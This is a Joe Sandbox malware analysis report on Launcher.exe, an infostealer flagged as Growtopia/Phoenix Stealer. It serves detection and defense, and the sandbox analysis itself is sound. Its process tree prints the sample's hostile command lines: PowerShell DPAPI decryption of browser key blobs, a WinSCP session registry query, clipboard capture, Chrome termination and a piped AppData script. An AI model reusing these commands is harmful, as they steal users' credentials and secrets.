Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Launcher.exe

Overview

General Information

Sample name:Launcher.exe
Analysis ID:1632296
MD5:b3670f482f26691a50a85376ddde32ad
SHA1:48b5c319abdf25365f3613893139f4f5c2f011f5
SHA256:c67dc6e962a28b421cdff1b27d9efa4ba97c3d467f2e21766d168c66b971926b
Infos:

Detection

Growtopia, Phoenix Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Growtopia
Yara detected Phoenix Stealer
Drops PE files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Overwrites Mozilla Firefox settings
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious command line found
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Enumeration for 3rd Party Creds From CLI
Sigma detected: PowerShell Get Clipboard
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64_ra
  • Launcher.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\Launcher.exe" MD5: B3670F482F26691A50A85376DDDE32AD)
    • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /d /s /c "hostname" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • HOSTNAME.EXE (PID: 7564 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
    • cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7640 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7724 cmdline: powershell.exe -noprofile - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 7940 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 1944 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE00D.tmp" "c:\Users\user\AppData\Local\Temp\0a5bipl0\CSC1B434CDB8C1C4BC4B88560F934C57755.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • reg.exe (PID: 2004 cmdline: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • cmd.exe (PID: 5192 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 1572 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 1748 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 3220 cmdline: taskkill /IM chrome.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2132 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4452 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 8032 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8048 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6244 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 928 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6464 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6436 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
  • chrome.exe (PID: 7004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,9387240218519264668,4487105206535593677,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
GrowtopiaAccording to PCrisk, Growtopia (also known as CyberStealer) is an information stealer written in the C# programming language. It can obtain system information, steal information from various applications, and capture screenshots. Its developer claims that it has created this software for educational purposes only. This stealer uses the name of a legitimate online game.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.growtopia

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: Launcher.exe PID: 6848JoeSecurity_GrowtopiaYara detected GrowtopiaJoe Security
      Process Memory Space: Launcher.exe PID: 6848JoeSecurity_PhoenixStealerYara detected Phoenix StealerJoe Security
        Process Memory Space: Launcher.exe PID: 6848JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Signatures

          Sigma detected: Dynamic .NET Compilation Via Csc.EXE
          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -noprofile -, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7724, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", ProcessId: 7940, ProcessName: csc.exe
          Sigma detected: Enumeration for 3rd Party Creds From CLI
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", CommandLine: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", CommandLine|base64offset|contains: AA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 6848, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", ProcessId: 2004, ProcessName: reg.exe
          Sigma detected: PowerShell Get Clipboard
          Source: Event LogsAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 53b85763-d2c4-4dc9-8676-bd28e8a7e613 Host Application = powershell Get-Clipboard Engine Version = 5.1.19041.1682 Runspace ID = e6f1a050-a6d1-4009-8ba6-d3a05dd815df Pipeline ID = 1 Command Name = Get-Clipboard Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Get-Clipboard): "Get-Clipboard", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 53b85763-d2c4-4dc9-8676-bd28e8a7e613 Host Application = powershell Get-Clipboard Engine Version = 5.1.19041.1682 Runspace ID = e6f1a050-a6d1-4009-8ba6-d3a05dd815df Pipeline ID = 1 Command Name = Get-Clipboard Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, data1: , data2: CommandInvocation(Get-Clipboard): "Get-Clipboard"
          Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 6848, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", ProcessId: 6244, ProcessName: cmd.exe
          Sigma detected: PowerShell Script Run in AppData
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 6848, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", ProcessId: 7644, ProcessName: cmd.exe
          Sigma detected: Startup Folder File Write
          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Launcher.exe, ProcessId: 6848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe
          Sigma detected: Dynamic CSharp Compile Artefact
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7724, TargetFilename: C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -noprofile -, CommandLine: powershell.exe -noprofile -, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7644, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -noprofile -, ProcessId: 7724, ProcessName: powershell.exe
          Sigma detected: Suspicious Execution of Hostname
          Source: Process startedAuthor: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "hostname", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 7564, ProcessName: HOSTNAME.EXE

          Data Obfuscation

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -noprofile -, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7724, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", ProcessId: 7940, ProcessName: csc.exe

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: Launcher.exeAvira: detected
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeAvira: detection malicious, Label: TR/Redcap.ojtat
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeReversingLabs: Detection: 34%
          Multi AV Scanner detection for submitted file
          Source: Launcher.exeVirustotal: Detection: 48%Perma Link
          Source: Launcher.exeReversingLabs: Detection: 34%
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.5% probability
          Source: unknownHTTPS traffic detected: 144.2.14.25:443 -> 192.168.2.16:49795 version: TLS 1.2
          Source: Launcher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb\ source: Launcher.exe, 00000000.00000000.1074024698.00007FF65E41B000.00000002.00000001.01000000.00000003.sdmp
          Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb source: Launcher.exe, 00000000.00000000.1074024698.00007FF65E41B000.00000002.00000001.01000000.00000003.sdmp
          Source: Binary string: D:\a\dpapi\dpapi\build\Release\dpapi.pdb source: Launcher.exe, 00000000.00000003.1398162788.00000174E0553000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394975843.00000089F5C42000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1402314759.00000174E086B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1403784383.00000174E0379000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400003763.00000174E00B6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1398162788.00000174E0508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1407889165.00000174E06D8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\a\node-sqlite3\node-sqlite3\build\Release\node_sqlite3.pdb source: Launcher.exe, 00000000.00000003.1374116741.00000174E0C11000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: Joe Sandbox ViewIP Address: 162.159.135.232 162.159.135.232
          Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
          Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownTCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
